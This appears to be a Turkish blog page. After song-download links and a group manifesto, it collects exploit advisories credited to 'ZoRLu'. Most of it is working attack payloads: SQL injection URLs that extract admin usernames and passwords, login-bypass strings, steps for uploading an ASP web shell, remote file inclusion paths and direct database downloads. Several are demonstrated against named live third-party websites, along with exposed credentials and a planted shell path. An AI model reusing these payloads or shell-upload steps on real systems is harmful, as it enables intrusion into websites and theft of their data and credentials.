
orhan hakalmaz bu türküyü süper seslendirmiş bence muhakkak dinleyin
Gafil Gezme Şaşkın ( insan yetiştiren türküler ):
TIKLA iNDiR
İnsan Yetiştiren Türküler Albümün Tamamı:
TIKLA iNDiR
"Şeytan İçinde ki Sestir; O Sese Kulak Ver"-Zorlu BUĞRAHAN-
Bazen odamızda oturup filozoflar ya da derin düşüncelere dalan adamlar gibi ne yapmaya çalıştığımızı anlamaya çalışırız. Yine böyle bir günün ardından ortaya çıkmış bir oluşum Experl..
Bu projeye başlarken her şeyi göze aldık. Her şey insana o kadar çekici geliyor ki, önünüzdeki olanaklardan birini seçtiğinizde tüm diğerlerine hayır demeniz gerekiyor. Biz Experl'i seçtik. Çünkü başarılı olmanın anahtarının tek bir noktaya odaklanmak olduğunu biliyoruz. Zamanımızın kısıtlı olduğunu,ve bu hedefle başkalarının düşüncelerinin sonuçlarıyla yaşam dogmasına takılıp artık başkalarının hayatını yaşayarak kısıtlı olan zamanımız harcamayacağımızıda biliyoruz.Yeteneğimizin ne olduğunu, nerede başarılı olabileceğimizi anlıyoruz, zamanımızı ve enerjimizi buraya yönlendiriyoruz.
Biz eğitimci değil öğrenciyiz. Öğrenen insanlarız. İşimizin en sevdiğimiz yanlarından biri de etrafta bizler gibi öğrenmeye meraklı ve arzulu olan insanların çokluğudur.
Experl'deki yazarların hepsi de işin içinde büyüyüp gelişmiş üstün zekalı insanlardır. İnsanı şaşırtan bir ekip. Buradaki insanların hiçbiri kendilerini zorlamıyor, pozisyon ve durumlarını umursamıyorlar ya da dışarıdan nasıl göründüklerine aldırmıyorlar.
Experl olarak çoğu zaman konuşur, tartışır ve hemen her zaman fikir birliği içinde oluruz. Şaşırtıcı olan şu ki önümüzdeki yıllara baktığımızda geçmiş olan yıllardan çok daha fazla şeyler yapabileceğimize inanıyoruz...
Bazıları bizim bu durumumuzdan şikayetçiler. Bizleri geleceğimizi bir kutuya bağlayan gençler olarak adlandırıyorlar. Eğer derbederlik ve çaresizlik bilgisayar başında gece yarılarına kadar oturup çalışmak, bazı araştırmalar yapmaksa o zaman bu tanım bize uyar. Bu tanımın da bizi küçülten bir kavram olduğunu düşünmüyoruz. Yine bazıları hala bu makine den altın geldiğini görmek ve bunu merak etmek yerine, bu altın külçelerini tuğlalar gibi dizmekten söz ediyorlar. O kadar olumsuz düşünceye rağmen biz bu işte sonuna kadar gitmeye kararlıyız. Çünkü sahip olacağımız en yüksek performans o yolun sonunda...
Yazılım üretmek bir sanat ve mühendislik arasında güzel bir iş birliği gerektirir. İşi bitirdiğin, ortaya çıkan eseri beğendiğin, taktir ettiğin zaman sanki kendinden bir şeyler oluşturmuş gibi hissedersin. Bizler bu heyecanı her an yaşayan bir oluşumuz...
Şunun da bilincindeyiz. Bize her zaman duvar olacak insanlar var olacak karşımızda. Ama bir gerçek var ki; ister seversin, ister nefret edersin ama Experl'i görmezden gelemezsin!
Experl || Just Run
abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj
link: http://packetstormsecurity.org/0812-exploits/abarcarmanu-sql.txt
link: http://www.experl.com/abarcar-manufacturer-system-script-plistingsphp-listingid-blind-remote-sql-inj-353/
Discovered By: ZoRLu
Exploit: ( remote )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=[SQL]
[SQL]=
-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--
exploit for demo:
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--
Exploit: ( blind )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )
pre { background: url(http://i39.tinypic.com/2airndc.jpg);border:1px solid #A6B0BF;font-size:120%;line-height:100%;overflow:auto;padding:10px;color:white }pre:hover {border:1px solid #efefef;}code {font-size:120%;text-align:left;margin:0;padding:0;color: #000000;}.clear { clear:both;overflow:hidden;}
E-Learning Portal Remote File Upload
link 1: http://www.exploiter5.com/all.php?id=47
link 2: http://packetstormsecurity.org/0812-exploits/elearning-upload.txt
Discovered By: ZoRLu
exp:
http://www.preprojects.com/elearning/uploaded/your_shell.asp
you register to site
login this site
after upload you_shell.asp
exp for demo:
register:
http://www.preprojects.com/elearning/new_student.asp
login:
role: select STUDENT
user: zorlu
passwd: zorlu1
shell
http://www.preprojects.com/elearning/uploaded/zehir4.asp ( Sizce Hack Benim Umrumda mI ? :S )
server daki siteler:
http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Time=3%3A04%3A29+AM&Path=c%3A%5Cinetpub%5Cwwwroot%5Chostnomi%5C&submit1=Git
buda golden gate:
http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Path=c:\inetpub\wwwroot\hostnomi\/adminpgg/pgg.ae&Time=3:19:20%20AM
link 1: http://packetstormsecurity.org/0812-exploits/esmartcart-upload.txt
link 2: http://www.exploiter5.com/all.php?id=48
Discovered By: ZoRLu
exp:
http://localhost/script/embadmin/base_ads/[id]_shell.asp
exp for demo:
http://preproject.com/GScart/embadmin/main_baseimage.asp?action=add
you go to here and click to gozat button, select your_shell.asp and write link
after goo shell
http://preproject.com/GScart/embadmin/base_ads/zehir4.asp
link 1: http://packetstormsecurity.org/0812-exploits/presimple-sqldisclose.txt
link 2: http://www.exploiter5.com/all.php?id=46
Discovered By: ZoRLu
exploit for demo:
you go this link:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,4,5,6,7,8,9+from+admin
right click to on photo and you must see
http://preproject.com/pgallery/pimages/4
column number 4
and you goo this links
username:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_name,5,6,7,8,9+from+admin
http://preproject.com/pgallery/pimages/admin
password:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_password,5,6,7,8,9+from+admin
http://preproject.com/pgallery/pimages/admin
so for demo:
username: admin
password: admin
exp for demo: (DD)
http://preproject.com/pgallery/database/photo.mdb
link 1: http://www.exploiter5.com/all.php?id=45
link 2: http://packetstormsecurity.org/0812-exploits/preasp-sqldisclose.txt
Discovered By: ZoRLu
exp for demo: (bypass)
login:
http://preproject.com/preaspjobboard//Employee/emp_login.asp
user: ZoRLu
passwd: ' or ' 1=1--
exp for demo: (DD)
http://preproject.com/preaspjobboard/db/pre.mdb
link: http://www.milw0rm.com/exploits/7494
link: http://packetstormsecurity.org/0812-exploits/zelta-rfusql.txt
Discovered By: ZoRLu
exp for demo: (R-SQL)
user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin
pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin
exp for demo: (B-SQL)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)
exp for demo: (auth bypass)
http://joineazy.com/members/login.asp
username: trt-turk@hotmail.com
pass: ' or '
exp for demo: (admin bypass)
http://joineazy.com/embadmin/admin_main.asp
http://joineazy.com/embadmin/site_setup.asp
http://joineazy.com/embadmin/main_baseimage.asp
exp for demo: (RFU)
firs you register to site
login to site and edit your pictures select your shell.asp
go your shell asp:
http://joineazy.com/members/member_pictures/shell.asp
EvimGibi Pro Resim Galerisi v1.0 (tr) resim.asp (kat_id) Sql inject
link: http://www.exploiter5.com/all.php?id=39
link: http://packetstormsecurity.org/0812-exploits/evimgibi-sql.txt
author: ZoRLu
dork: intext:"Asp Programlama : EvimGibi"
exploit:
http://localhost/script_path/resim.asp?islem=altkat&kat_id=[SQL]
[SQL]=
-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler
example:
http://www.sabanciogretmenevi.com.tr/album/resim.asp?islem=altkat&kat_id=-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler
CFAGCMS v1 (right.php title) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7483
Discovered By: ZoRLu
exploit:
http://localhost/cfagcms/right.php?title=[SQL]
[SQL]=
ZoRLu'+union+select+0,concat(user(),0x3a,database(),0x3a,version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
link: http://www.milw0rm.com/exploits/7392
Discovered By: ZoRLu
file:
_conf/core/common-tpl-vars.php
c0de:
require($confdir.'lang/langpack.'.$lang.'.php'); ( line 23 )
rfi:
http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt?
lfi:
http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi]
link: http://www.milw0rm.com/exploits/7390
Discovered By: ZoRLu
exp for demo:
http://www.dotnetindex.com/demos/prodownloadmanager/admin/
user: ZoRLu
passwd: ' or '
link: http://www.milw0rm.com/exploits/7373
Discovered By: ZoRLu
exp: ( rfu )
http://localhost/script/banners/shell.asp
exp: ( dd )
http://localhost/script/data/DataBase.mdb
rfu: ( for demo )
you go here:
http://demo.merlix.com/adbanner5/Upload.Asp
select your shell.asp
after click to upload button
go your shell.asp
http://demo.merlix.com/adbanner5/banners/xyz.asp
dd: ( for demo )
http://demo.merlix.com/adbanner5/data/DataBase.mdb
link: http://www.milw0rm.com/exploits/7361
Discovered By: ZoRLu
exp for demo: ( DD )
http://demo.merlix.com/portal/xportal.mdb
link: http://www.milw0rm.com/exploits/7360
Discovered By: ZoRLu
exp for demo: ( DD )
http://demo.merlix.com/autodealer/auto.mdb
link: http://www.milw0rm.com/exploits/7359
Discovered By: ZoRLu
exp for demo: ( DD )
http://demo.merlix.com/ticker/news.mdb
link: http://www.milw0rm.com/exploits/7348
Discovered By: ZoRLu
exp for demo: ( Bypass )
http://demo.merlix.com/school/admin/config.asp
http://demo.merlix.com/school/admin/users.asp
exp for demo: ( DD )
http://demo.merlix.com/school/db/db.mdb
Discovered By: ZoRLu
exp for demo: ( DD )
http://demo.merlix.com/templatecreature/workDB/templatemonster.mdb
exp for demo: ( sql inj )
user: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=999999+union+select+1,vcUserName,3+from+tb_adminUser
pass: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=999999+union+select+1,vcPassword,3+from+tb_adminUser
zorlu kimdir? züktür et ;)